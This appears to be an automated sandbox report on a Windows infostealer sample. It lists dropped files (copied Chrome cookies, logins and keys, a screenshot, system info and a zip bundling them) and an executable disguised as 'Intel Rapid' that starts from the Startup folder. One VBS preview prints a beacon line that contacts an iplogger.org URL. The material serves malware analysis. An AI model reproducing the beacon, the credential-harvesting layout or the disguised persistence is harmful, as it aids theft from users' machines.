                                                                    Preview: PK..........<S................screenshot.jpgUT....Sa.Sa.Sa.I.p...Bx'XV....`[.8....i..%....W<\...9..{nu.@..F.s.E..l........w..=...k...%5.{i..MI.v.....bI..S.q.uMb...'.....i:.m.g?..~t._5.......|.$.....93..~}..n..V..j.--.G......m.....I|......Rk=.?%.c....g...vI......E.w.`j@<z....(*.t%.....F..A....L B.9;.u...........!p....I..nC+..j.$.Z...+*....3.v...U.....)..}|&.;.x.+.wO..xn......Z,..pn..s.L.}.UGT)..D6...1...#'..4...~H.\.....1...=....wd......0..r..\.<..+...w.FrI..Tig.w...5.n.!.JER.;TF}......B..s:KBz.i.U.Ma}.......Hw.....y..r./%.G({......7_:...z....2^k...&%u...X..faX...Z.).B.6...{.5...?.....[2.....Y...0.1>D...*..Oq...9Q0..d.W"Z.$.AK5r......_....A..3f....I .Nm.%....l..I%:K<31....F..Q...Bw..G......(.M...Sh..S....#?....9.!}.c.v:..*.r.PP.!p...n.Q.R..`..h..?.(.....aO.'.b..$.8-.u=2.C...r...D..Q#}o.l.t.6E.<.8.GP.C......A_).O.)cW.?.Lv$.J..d.v.5.Y...!...v.{....".h......O.xa......,b.1.....{.goC%.J6.L.O..CL...V..>.3X.O.g.+2..".5..Q..bq/C...YT@/+e.@-G.
                                                                    C:\Users\user\AppData\Local\Temp\djUYPUrixI\_Files\_Chrome\default_cookies.db
                                                                    Process:C:\Users\user\Desktop\7yyqdBJVGf.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                    Category:dropped
                                                                    Size (bytes):20480
                                                                    Entropy (8bit):0.6969296358976265
                                                                    Encrypted:false
                                                                    SSDEEP:24:TLbJLbXaFpEO5bNmISHn06UwcQPx5fBo2+tYeF+X:T5LLOpEO5J/Kn7U1uBo2UYeQ
                                                                    MD5:A9DBC7B8E523ABE3B02D77DBF2FCD645
                                                                    SHA1:DF5EE16ECF4B3B02E312F935AE81D4C5D2E91CA8
                                                                    SHA-256:39B4E45A062DEA6F541C18FA1A15C5C0DB43A59673A26E2EB5B8A4345EE767AE
                                                                    SHA-512:3CF87455263E395313E779D4F440D8405D86244E04B5F577BB9FA2F4A2069DE019D340F6B2F6EF420DEE3D3DEEFD4B58DA3FCA3BB802DE348E1A810D6379CC3B
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    Preview: SQLite format 3......@ ..........................................................................C....... ..g... .8....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                    C:\Users\user\AppData\Local\Temp\djUYPUrixI\_Files\_Chrome\default_key.bin
                                                                    Process:C:\Users\user\Desktop\7yyqdBJVGf.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):32
                                                                    Entropy (8bit):5.0
                                                                    Encrypted:false
                                                                    SSDEEP:3:YNDYsp+:YND2
                                                                    MD5:BE5DD481C61E2B68E59A586D1226CA82
                                                                    SHA1:6A656AA1A7BDECC0EEBE7F20ED6A342635CDB938
                                                                    SHA-256:C67092D05B4F5A91EFBE49DC5E6C03C157FE74417F0E3602332B8DFA63B2C4D2
                                                                    SHA-512:E39A218E0FAA03CF63C5825FABCA7EF4C163F1D8FB6D5AA938BD16D32E98B8EB08DD29E9D2FD428BA08D9F7E4CBEC5D19F46F4414E4D13833D3C8C3BCB372A98
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    Preview: ....C..0.f=@.&.......M....K...R
                                                                    C:\Users\user\AppData\Local\Temp\djUYPUrixI\_Files\_Chrome\default_logins.db
                                                                    Process:C:\Users\user\Desktop\7yyqdBJVGf.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                    Category:dropped
                                                                    Size (bytes):40960
                                                                    Entropy (8bit):0.792852251086831
                                                                    Encrypted:false
                                                                    SSDEEP:48:2i3nBA+IIY1PJzr9URCVE9V8MX0D0HSFlNUfAlGuGYFoNSs8LKvUf9KVyJ7hU:pBCJyC2V8MZyFl8AlG4oNFeymw
                                                                    MD5:81DB1710BB13DA3343FC0DF9F00BE49F
                                                                    SHA1:9B1F17E936D28684FFDFA962340C8872512270BB
                                                                    SHA-256:9F37C9EAF023F2308AF24F412CBD850330C4EF476A3F2E2078A95E38D0FACABB
                                                                    SHA-512:CF92D6C3109DAB31EF028724F21BAB120CF2F08F7139E55100292B266A363E579D14507F1865D5901E4B485947BE22574D1DBA815DE2886C118739C3370801F1
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    Preview: SQLite format 3......@ ..........................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                    C:\Users\user\AppData\Local\Temp\djUYPUrixI\_Files\_Chrome\default_webdata.db
                                                                    Process:C:\Users\user\Desktop\7yyqdBJVGf.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                    Category:dropped
                                                                    Size (bytes):73728
                                                                    Entropy (8bit):1.1874185457069584
                                                                    Encrypted:false
                                                                    SSDEEP:96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq
                                                                    MD5:72A43D390E478BA9664F03951692D109
                                                                    SHA1:482FE43725D7A1614F6E24429E455CD0A920DF7C
                                                                    SHA-256:593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
                                                                    SHA-512:FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7CE
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    Preview: SQLite format 3......@ .......$..................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                    C:\Users\user\AppData\Local\Temp\djUYPUrixI\_Files\_Information.txt
                                                                    Process:C:\Users\user\Desktop\7yyqdBJVGf.exe
                                                                    File Type:Little-endian UTF-16 Unicode text, with very long lines, with CRLF, CR line terminators
                                                                    Category:dropped
                                                                    Size (bytes):20422
                                                                    Entropy (8bit):3.5217410771938957
                                                                    Encrypted:false
                                                                    SSDEEP:384:1l8UOpGQGXJ0eDcDDfZmEiv5bJtWmGu37mx1FqGbUpYR6PWhBzR6em7HQCV1FaoO:1nOpR2J0eDcDDfZmEiv5bJtWmGu37mxJ
                                                                    MD5:F0F302D7C1F31B4C7132C2A59DC7D3AF
                                                                    SHA1:9D289BCB09919874C6B05B777455B26E1F4975C1
                                                                    SHA-256:1467B1D39A4EE0DE7B7D5F9C7F4B8D097AF21C1C623E05124CE4DE7B7917B648
                                                                    SHA-512:332F12B971184BD67416DAC47625A63ACC59C326EAA89D9D86F87C9F72A1F8626F06089105F2E0B07FECF0BEFB7DFB388B8C2FAC8E230170FEEDF60D04300AA8
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    Preview: ..S.t.a.r.t. .B.u.i.l.d.:. . . . . . . . . . . . . .C.:.\.U.s.e.r.s.\.f.r.o.n.t.d.e.s.k.\.D.e.s.k.t.o.p.\.7.y.y.q.d.B.J.V.G.f...e.x.e.....O.S.:. . . . . . . . . . . . . . . . . . . . . . .W.i.n.d.o.w.s. .1.0. .P.r.o. . . .6.4.-.b.i.t._.(.x.6.4.). . . .B.u.i.l.d.:. .1.7.1.3.4. . . .R.e.l.e.a.s.e.:. .1.8.0.3.....O.S. .L.a.n.g.u.a.g.e.:. . . . . . . . . . . . . .e.n.-.U.S.....K.e.y.b.o.a.r.d. .L.a.n.g.u.a.g.e.s.:. . . . . . .E.n.g.l.i.s.h. .(.U.n.i.t.e.d. .S.t.a.t.e.s.). .|. .....L.o.c.a.l. .D.a.t.e. .a.n.d. .T.i.m.e.:. . . . . .2.0.2.1.-.0.9.-.2.8. .1.6.:.3.1.:.2.3.....U.T.C.:. . . . . . . . . . . . . . . . . . . . . .-.0.7.0.0.....U.s.e.r.N.a.m.e. .(.C.o.m.p.u.t.e.r.N.a.m.e.).:. .f.r.o.n.t.d.e.s.k. .(.5.6.2.2.5.8.).....C.P.U.:. . . . . . . . . . . . . . . . . . . . . .I.n.t.e.l.(.R.). .C.o.r.e.(.T.M.).2. .C.P.U. .6.6.0.0. .@. .2...4.0. .G.H.z. .(.C.o.r.e.s.:. .4.).....T.o.t.a.l. .R.A.M.:. . . . . . . . . . . . . . . .8.1.9.1. . .M.B.....G.P.U.:. . . . . . . . . . . . . . . . . . . . . .
                                                                    C:\Users\user\AppData\Local\Temp\djUYPUrixI\_Files\_Screen_Desktop.jpeg
                                                                    Process:C:\Users\user\Desktop\7yyqdBJVGf.exe
                                                                    File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 1280x1024, frames 3
                                                                    Category:dropped
                                                                    Size (bytes):71402
                                                                    Entropy (8bit):7.814753768424839
                                                                    Encrypted:false
                                                                    SSDEEP:1536:Ik3jy5vV5nExVY6WRxrdTul+UqEaN776pDeaw7qk5Zn541XV8v:oRV5naWFSljqEtpg7TXnqxY
                                                                    MD5:8857E81A87DD6EF97F3F4744EB564692
                                                                    SHA1:E7993E4B309E202FBDE8BFD4CCF65013AA88FC03
                                                                    SHA-256:FB5864C55C356561FB5FF45D19A030E02216DEB58E491AFA5865AFB4D2E6502E
                                                                    SHA-512:2D8FB1974E0EDD37258202492C6ED2C6BD3462DF04F425B26FD3C61BF053C0903C6C329C95DB24E677C257A2B9C7C3AD43EBD992574F929E419002DBC4B975D8
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    Preview: ......JFIF.....`.`.....C................%.....- ".%5/874/43;BUH;?P?34JdKPWZ_`_9Ghog\nU]_[...C.......+..+[=4=[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[..........."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..E-.(...(..U..K2..,p$s.~...*.:-.|.+.......6.Y.t....X..s...r6.\..?....I..a..~dQ..cQS..\....^0z.8?C...D.E-..JJZJ.%%v1...H.....7.....;...........s.b.....9v8.+....?..O....[.Se.=.0c..7..8..hTv...(.W..+R..(...+..?.t.kO...'g.].U..I..+.e......._.._..i?...........4W}...........q...h=..\..F..J...z..$.j.i)M...E-..J+O.vp.......V*..v5....?.._..i9$5..OEz.. z..........(EX
                                                                    C:\Users\user\AppData\Local\Temp\djUYPUrixI\files_\_Chrome\default_cookies.db
                                                                    Process:C:\Users\user\Desktop\7yyqdBJVGf.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                    Category:dropped
                                                                    Size (bytes):20480
                                                                    Entropy (8bit):0.6969296358976265
                                                                    Encrypted:false
                                                                    SSDEEP:24:TLbJLbXaFpEO5bNmISHn06UwcQPx5fBo2+tYeF+X:T5LLOpEO5J/Kn7U1uBo2UYeQ
                                                                    MD5:A9DBC7B8E523ABE3B02D77DBF2FCD645
                                                                    SHA1:DF5EE16ECF4B3B02E312F935AE81D4C5D2E91CA8
                                                                    SHA-256:39B4E45A062DEA6F541C18FA1A15C5C0DB43A59673A26E2EB5B8A4345EE767AE
                                                                    SHA-512:3CF87455263E395313E779D4F440D8405D86244E04B5F577BB9FA2F4A2069DE019D340F6B2F6EF420DEE3D3DEEFD4B58DA3FCA3BB802DE348E1A810D6379CC3B
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    Preview: SQLite format 3......@ ..........................................................................C....... ..g... .8....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                    C:\Users\user\AppData\Local\Temp\djUYPUrixI\files_\_Chrome\default_key.bin
                                                                    Process:C:\Users\user\Desktop\7yyqdBJVGf.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):32
                                                                    Entropy (8bit):5.0
                                                                    Encrypted:false
                                                                    SSDEEP:3:YNDYsp+:YND2
                                                                    MD5:BE5DD481C61E2B68E59A586D1226CA82
                                                                    SHA1:6A656AA1A7BDECC0EEBE7F20ED6A342635CDB938
                                                                    SHA-256:C67092D05B4F5A91EFBE49DC5E6C03C157FE74417F0E3602332B8DFA63B2C4D2
                                                                    SHA-512:E39A218E0FAA03CF63C5825FABCA7EF4C163F1D8FB6D5AA938BD16D32E98B8EB08DD29E9D2FD428BA08D9F7E4CBEC5D19F46F4414E4D13833D3C8C3BCB372A98
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    Preview: ....C..0.f=@.&.......M....K...R
                                                                    C:\Users\user\AppData\Local\Temp\djUYPUrixI\files_\_Chrome\default_logins.db
                                                                    Process:C:\Users\user\Desktop\7yyqdBJVGf.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                    Category:dropped
                                                                    Size (bytes):40960
                                                                    Entropy (8bit):0.792852251086831
                                                                    Encrypted:false
                                                                    SSDEEP:48:2i3nBA+IIY1PJzr9URCVE9V8MX0D0HSFlNUfAlGuGYFoNSs8LKvUf9KVyJ7hU:pBCJyC2V8MZyFl8AlG4oNFeymw
                                                                    MD5:81DB1710BB13DA3343FC0DF9F00BE49F
                                                                    SHA1:9B1F17E936D28684FFDFA962340C8872512270BB
                                                                    SHA-256:9F37C9EAF023F2308AF24F412CBD850330C4EF476A3F2E2078A95E38D0FACABB
                                                                    SHA-512:CF92D6C3109DAB31EF028724F21BAB120CF2F08F7139E55100292B266A363E579D14507F1865D5901E4B485947BE22574D1DBA815DE2886C118739C3370801F1
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    Preview: SQLite format 3......@ ..........................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                    C:\Users\user\AppData\Local\Temp\djUYPUrixI\files_\_Chrome\default_webdata.db
                                                                    Process:C:\Users\user\Desktop\7yyqdBJVGf.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                    Category:dropped
                                                                    Size (bytes):73728
                                                                    Entropy (8bit):1.1874185457069584
                                                                    Encrypted:false
                                                                    SSDEEP:96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq
                                                                    MD5:72A43D390E478BA9664F03951692D109
                                                                    SHA1:482FE43725D7A1614F6E24429E455CD0A920DF7C
                                                                    SHA-256:593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
                                                                    SHA-512:FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7CE
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    Preview: SQLite format 3......@ .......$..................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                    C:\Users\user\AppData\Local\Temp\djUYPUrixI\files_\screenshot.jpg
                                                                    Process:C:\Users\user\Desktop\7yyqdBJVGf.exe
                                                                    File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 1280x1024, frames 3
                                                                    Category:dropped
                                                                    Size (bytes):71402
                                                                    Entropy (8bit):7.814753768424839
                                                                    Encrypted:false
                                                                    SSDEEP:1536:Ik3jy5vV5nExVY6WRxrdTul+UqEaN776pDeaw7qk5Zn541XV8v:oRV5naWFSljqEtpg7TXnqxY
                                                                    MD5:8857E81A87DD6EF97F3F4744EB564692
                                                                    SHA1:E7993E4B309E202FBDE8BFD4CCF65013AA88FC03
                                                                    SHA-256:FB5864C55C356561FB5FF45D19A030E02216DEB58E491AFA5865AFB4D2E6502E
                                                                    SHA-512:2D8FB1974E0EDD37258202492C6ED2C6BD3462DF04F425B26FD3C61BF053C0903C6C329C95DB24E677C257A2B9C7C3AD43EBD992574F929E419002DBC4B975D8
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    Preview: ......JFIF.....`.`.....C................%.....- ".%5/874/43;BUH;?P?34JdKPWZ_`_9Ghog\nU]_[...C.......+..+[=4=[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[..........."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..E-.(...(..U..K2..,p$s.~...*.:-.|.+.......6.Y.t....X..s...r6.\..?....I..a..~dQ..cQS..\....^0z.8?C...D.E-..JJZJ.%%v1...H.....7.....;...........s.b.....9v8.+....?..O....[.Se.=.0c..7..8..hTv...(.W..+R..(...+..?.t.kO...'g.].U..I..+.e......._.._..i?...........4W}...........q...h=..\..F..J...z..$.j.i)M...E-..J+O.vp.......V*..v5....?.._..i9$5..OEz.. z..........(EX
                                                                    C:\Users\user\AppData\Local\Temp\djUYPUrixI\files_\system_info.txt
                                                                    Process:C:\Users\user\Desktop\7yyqdBJVGf.exe
                                                                    File Type:Little-endian UTF-16 Unicode text, with very long lines, with CRLF, CR line terminators
                                                                    Category:dropped
                                                                    Size (bytes):20422
                                                                    Entropy (8bit):3.5217410771938957
                                                                    Encrypted:false
                                                                    SSDEEP:384:1l8UOpGQGXJ0eDcDDfZmEiv5bJtWmGu37mx1FqGbUpYR6PWhBzR6em7HQCV1FaoO:1nOpR2J0eDcDDfZmEiv5bJtWmGu37mxJ
                                                                    MD5:F0F302D7C1F31B4C7132C2A59DC7D3AF
                                                                    SHA1:9D289BCB09919874C6B05B777455B26E1F4975C1
                                                                    SHA-256:1467B1D39A4EE0DE7B7D5F9C7F4B8D097AF21C1C623E05124CE4DE7B7917B648
                                                                    SHA-512:332F12B971184BD67416DAC47625A63ACC59C326EAA89D9D86F87C9F72A1F8626F06089105F2E0B07FECF0BEFB7DFB388B8C2FAC8E230170FEEDF60D04300AA8
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    Preview: ..S.t.a.r.t. .B.u.i.l.d.:. . . . . . . . . . . . . .C.:.\.U.s.e.r.s.\.f.r.o.n.t.d.e.s.k.\.D.e.s.k.t.o.p.\.7.y.y.q.d.B.J.V.G.f...e.x.e.....O.S.:. . . . . . . . . . . . . . . . . . . . . . .W.i.n.d.o.w.s. .1.0. .P.r.o. . . .6.4.-.b.i.t._.(.x.6.4.). . . .B.u.i.l.d.:. .1.7.1.3.4. . . .R.e.l.e.a.s.e.:. .1.8.0.3.....O.S. .L.a.n.g.u.a.g.e.:. . . . . . . . . . . . . .e.n.-.U.S.....K.e.y.b.o.a.r.d. .L.a.n.g.u.a.g.e.s.:. . . . . . .E.n.g.l.i.s.h. .(.U.n.i.t.e.d. .S.t.a.t.e.s.). .|. .....L.o.c.a.l. .D.a.t.e. .a.n.d. .T.i.m.e.:. . . . . .2.0.2.1.-.0.9.-.2.8. .1.6.:.3.1.:.2.3.....U.T.C.:. . . . . . . . . . . . . . . . . . . . . .-.0.7.0.0.....U.s.e.r.N.a.m.e. .(.C.o.m.p.u.t.e.r.N.a.m.e.).:. .f.r.o.n.t.d.e.s.k. .(.5.6.2.2.5.8.).....C.P.U.:. . . . . . . . . . . . . . . . . . . . . .I.n.t.e.l.(.R.). .C.o.r.e.(.T.M.).2. .C.P.U. .6.6.0.0. .@. .2...4.0. .G.H.z. .(.C.o.r.e.s.:. .4.).....T.o.t.a.l. .R.A.M.:. . . . . . . . . . . . . . . .8.1.9.1. . .M.B.....G.P.U.:. . . . . . . . . . . . . . . . . . . . . .
                                                                    C:\Users\user\AppData\Local\Temp\djUYPUrixI\mrBjrfbmEC.zip
                                                                    Process:C:\Users\user\Desktop\7yyqdBJVGf.exe
                                                                    File Type:Zip archive data, at least v2.0 to extract
                                                                    Category:dropped
                                                                    Size (bytes):72919
                                                                    Entropy (8bit):7.995408367456888
                                                                    Encrypted:true
                                                                    SSDEEP:1536:JYJOTBzrEMWhfbS/go4mfNoMGkxtij9V0cTBcB1nGldKt3gl4:G2zY79O/gvEWktijfByWdKpgO
                                                                    MD5:14DF06C897F9DAE58783D3381F016CC4
                                                                    SHA1:27DE8F7A504841BB6F956AF8017ADE3F814B2C08
                                                                    SHA-256:958D14E52C68B95B7DA2F19C9BDDAB8915CC92A7D6309AC47E5BEBEF5F09C234
                                                                    SHA-512:DDA618461371C6551022FED4F0292A6C5EAEC3F953BFD276491AFAEFEED18DD4D2F94675FED9D6595885E31911F8784F22F150D9F4BE4C960E025C998D37A11C
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    Preview: PK.........y>Q.........P......_Chrome/default_cookies.dbUT....t_.Sa.Sa...wf.p.].T.x.v.*.....AG...{y%.cb.l&...[..D0..s...-.u..ML.9O.'>7...v.U....pC.~c..5......[..h)sM....f:.s.. .2.+Cr..~..vP.%4}.S.. .]n....g.....E.......n.[.q....k._...4.7`<....5..4.hJ.......]v(.fje.3-..p.......s6...v..#...R.'.<.....:.P.^xR.\.Bv..t,..s(Oy. .......Q.......|..7.+...?...*.8..u."..?rs>T.5..a....0.d=u@..b.L..!..%,.^...L3.>...._..,VB( Op.h.`.~%q...xj.co..L]..>..._)H._.s....lfm.8..0.....V.=..z.y..v[..[}...5..U#.........\J.b..!.m.Y.#..0..wB"~:..S*...D.....6.Lv.2.32..UX..../.8-....4/~w..p....v.....nc....d...F.|/.....F....7....J...J..X.K{.|.}j....W#".....5X.#&>o.....z+.T.@.r2G ...^.4t1.Kel....t.-<q.Y..`R..c.uD.4...u...MO.g..2...?.-~.^%7a.n3W..K............<.Y.a..qY{].^"@...r>..*...h...B.{...X...J....=.....2=.....9...H..`..t....S.j.g....<..iL.Yvj;"Q.WF........27.#..u..\.....@.$.).p..6...rh='.)0y..yo.b/...a/.=7NB.[..~f.t.a.I.(........s...6f...e.R+qF5.o.|...d^..
                                                                    C:\Users\user\AppData\Local\Temp\lmlpnsexh.vbs
                                                                    Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\Bisogna.exe.com
                                                                    File Type:ASCII text
                                                                    Category:modified
                                                                    Size (bytes):133
                                                                    Entropy (8bit):5.096117172231276
                                                                    Encrypted:false
                                                                    SSDEEP:3:daiX9GTvvRFzxcXhm8jtyH4b4tHNSCCAvKy6N0Mn:dPtGTvJFmXg08HfHcCCASy6N0M
                                                                    MD5:421471610475BD2C9CB8F9B534A64BFD
                                                                    SHA1:37EEF2409CC2B31FE5E481393699AC35329230E1
                                                                    SHA-256:BA5B5035D753ECB72FFE3D3C1F30EA72BD90E34EFCBD11B12041975DC98FEFD4
                                                                    SHA-512:6C7957B7D88FB78080D126A296B656B6AA5F12C55B5EC33743F22F10CC6B3F41912D42B43C6C561699282A681C03704FA408E2DDD5A1B9EB40558699A33201FB
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    Preview: On error resume next..set rsymqli = CreateObject("Microsoft.XMLHTTP").rsymqli.open "GET","https://iplogger.org/1N5Jh7",0.rsymqli.send
                                                                    C:\Users\user\AppData\Local\Temp\nsc24D7.tmp\UAC.dll
                                                                    Process:C:\Users\user\AppData\Local\Temp\File.exe
                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):14848
                                                                    Entropy (8bit):5.715583967305762
                                                                    Encrypted:false
                                                                    SSDEEP:192:DiF6v2imI36Op/tGZGfWxdyWHD0I53vLl7WVl8e04IpDlPjs:DGVY6ClGoWxXH75T1WVl83lLs
                                                                    MD5:ADB29E6B186DAA765DC750128649B63D
                                                                    SHA1:160CBDC4CB0AC2C142D361DF138C537AA7E708C9
                                                                    SHA-256:2F7F8FC05DC4FD0D5CDA501B47E4433357E887BBFED7292C028D99C73B52DC08
                                                                    SHA-512:B28ADCCCF0C33660FECD6F95F28F11F793DC9988582187617B4C113FB4E6FDAD4CF7694CD8C0300A477E63536456894D119741A940DDA09B7DF3FF0087A7EADA
                                                                    Malicious:false
                                                                    Antivirus:
                                                                    • Antivirus: Metadefender, Detection: 0%, Browse
                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                    Reputation:unknown
                                                                    Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........#.?NB.lNB.lNB.li..lEB.lNB.l.B.li..lMB.li..lOB.li..lOB.li..lOB.lRichNB.l................PE..L...@.dU...........!.....,...........).......@...............................p.......................................;..<....3..x....P.......................`..........................................................\............................text....+.......,.................. ..`.data...d....@.......0..............@....rsrc........P.......2..............@..@.reloc.......`.......4..............@..B........................................................................................................................................................................................................................................................................................................................................................................................
                                                                    C:\Users\user\AppData\Roaming\Intel Rapid\IntelRapid.exe
                                                                    Process:C:\Users\user\AppData\Local\Temp\dislip\parted.exe
                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):3570176
                                                                    Entropy (8bit):7.965168872050083
                                                                    Encrypted:false
                                                                    SSDEEP:49152:2uktwV1jARt5+JYoCQnKlZqpvjQmjmwqjlQ1XDDAiKHbZ5sJcinzTPJmTlWouyEy:S4AR2JfFm87Qmx+Q1tfzuoouGR
                                                                    MD5:C92045F9553387FE8AB90B2B6A24E805
                                                                    SHA1:2DBEAA703044CC1862C4DEFB3A6D296F2AAF21CB
                                                                    SHA-256:EAB2C4113047771525F41FAAEAB5E4946691F44C9E5848C540593752C10D3C47
                                                                    SHA-512:238009E38F830F6354C30967E6A60FD237262D9B7515B591CC24C471574095B4E62B0B29D84DD4B21AD33C8BA3ABCF10C2985C8C67FBBDDDF90BC652715106FF
                                                                    Malicious:true
                                                                    Antivirus:
                                                                    • Antivirus: ReversingLabs, Detection: 36%
                                                                    Reputation:unknown
                                                                    Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.....................73.....71.....70......................sT.....sT........?...sT.....<......<......Rich............PE..d...(..\.........."......P...J......X.`........@....................................p#7...`.................................................................T.`..................................................................................................... .O.......................... ..` .....`...T..................@..@ x7...`......................@... ............................@..@ .............*..............@..@ H............,..............@..@ |............0..............@..B.idata...............8..............@....themida..]..........:..............`....boot....@5...`..@5..:..............`..`................................................................................
                                                                    C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IntelRapid.lnk
                                                                    Process:C:\Users\user\AppData\Local\Temp\dislip\parted.exe
                                                                    File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Description string, Has Relative path, Archive, ctime=Tue Sep 28 21:24:18 2021, mtime=Tue Sep 28 21:24:18 2021, atime=Tue Sep 28 08:46:06 2021, length=3570176, window=hide
                                                                    Category:dropped
                                                                    Size (bytes):941
                                                                    Entropy (8bit):5.038850272887955
                                                                    Encrypted:false
                                                                    SSDEEP:12:8i4d2Ce4GL2rCglK0Y//N3leL0lqf2BplrqhjAyuNHnEmiT2y7D73dBm:8p28GLAF+FV4KquBsAygEm2jm
                                                                    MD5:65AA1D5289150C843AB180F7D4BC8670
                                                                    SHA1:F5A710C3D618DBD09897FB3B35085F6C4A1CAEE5
                                                                    SHA-256:97983619E6E9D349849AEADABED1990FB1E50576C943CA150DB4DB97A94F1476
                                                                    SHA-512:63DAEF44D88B730BABBE815AC41111BCE91553BDDFF08C866AD8803511449BAE0884426EA3D520F7B1FC9356933648CFFDD66826631523DEE69DE2E135AE0D0C
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    Preview: L..................F.... ...xw......u.7.......O.M....z6.......................:..DG..Yr?.D..U..k0.&...&......7...#-...7u.=...99R.........t...CFSF..1......N....AppData...t.Y^...H.g.3..(.....gVA.G..k...@.......N..<S......Y.....................P/.A.p.p.D.a.t.a...B.V.1.....<S....Roaming.@.......N..<S.......Y...................."...R.o.a.m.i.n.g.....`.1.....<S....INTELR~1..H......<S..<S.......Z.....................,..I.n.t.e.l. .R.a.p.i.d.....j.2..z6.<S.M .INTELR~1.EXE..N......<S..<S................................I.n.t.e.l.R.a.p.i.d...e.x.e.......l...............-.......k............^F......C:\Users\user\AppData\Roaming\Intel Rapid\IntelRapid.exe....I.n.t.e.l. .R.a.p.i.d.).....\.....\.....\.....\.....\.I.n.t.e.l. .R.a.p.i.d.\.I.n.t.e.l.R.a.p.i.d...e.x.e.`.......X.......562258...........!a..%.H.VZAj....^..0............!a..%.H.VZAj....^..0...........E.......9...1SPS..mD..pH.H@..=x.....h....H......K*..@.A..7sFJ............

                                                                    Static File Info

                                                                    General

                                                                    File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                    Entropy (8bit):6.552669921961029
                                                                    TrID:
                                                                    • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                    • Generic Win/DOS Executable (2004/3) 0.02%
                                                                    • DOS Executable Generic (2002/1) 0.02%
                                                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                    File name:7yyqdBJVGf.exe
                                                                    File size:380416
                                                                    MD5:267667a4bbfdfcf20c407c2b191fd0ed
                                                                    SHA1:73870de4caa2eaaf162c81c34740527e12b8467c
                                                                    SHA256:c3b9a8dde21bf3c1bb09426a261c77eb4b59cb2f36ac82e5b8f6b4a4d3565b5b
